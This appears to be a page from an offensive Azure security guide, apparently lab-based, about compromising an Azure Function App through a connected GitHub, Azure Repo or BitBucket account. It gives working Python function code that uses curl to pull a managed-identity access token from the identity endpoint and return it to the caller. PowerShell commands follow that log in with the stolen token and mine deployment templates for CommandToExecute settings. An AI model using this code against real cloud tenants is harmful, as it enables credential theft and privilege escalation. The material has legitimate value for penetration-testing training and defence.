Function App

For example, if GitHub is used as the provider, compromise of a GitHub account that can commit code will lead to compromise of the function app

This requires access to a Azure Repo, GitHub, or BitBucket account that pushes to a function app.

With GitHub, you can push the following code which will give you an access token of the managed identity.

1

Commit code

import logging, os
import azure.functions as func
def main(req: func.HttpRequest) -> func.HttpResponse:
logging.info('Python HTTP trigger function processed a request.')
IDENTITY_ENDPOINT = os.environ['IDENTITY_ENDPOINT']
IDENTITY_HEADER = os.environ['IDENTITY_HEADER']
cmd = 'curl "%s?resource=https://management.azure.com&api-
version=2017-09-01" -H secret:%s' % (IDENTITY_ENDPOINT,
IDENTITY_HEADER)
val = os.popen(cmd).read()
return func.HttpResponse(val, status_code=200)
2

Authenticate and check access

$accesstoken = 'eyJ0…'
Connect-AzAccount -AccessToken $AccessToken -AccountId 95f40eea-6653-4e11-b545-d9c2f5f90a29
3

Check resource group and deployment

Get-AzResourceGroup
Get-AzResourceGroupDeployment -ResourceGroupName ExampleName
Save-AzResourceGroupDeploymentTemplate -ResourceGroupName examplename -DeploymentName stevencking_defcorphq.onmicrosoft.com.sapsrv
(cat C:\AzAD\Tools\stevencking_defcorphq.onmicrosoft.com.sapsrv.json |ConvertFrom-Json |select -ExpandProperty Resources).resources.Properties.Settings.CommandToExecute

PreviousARM TemplatesNextUser Data

Last updated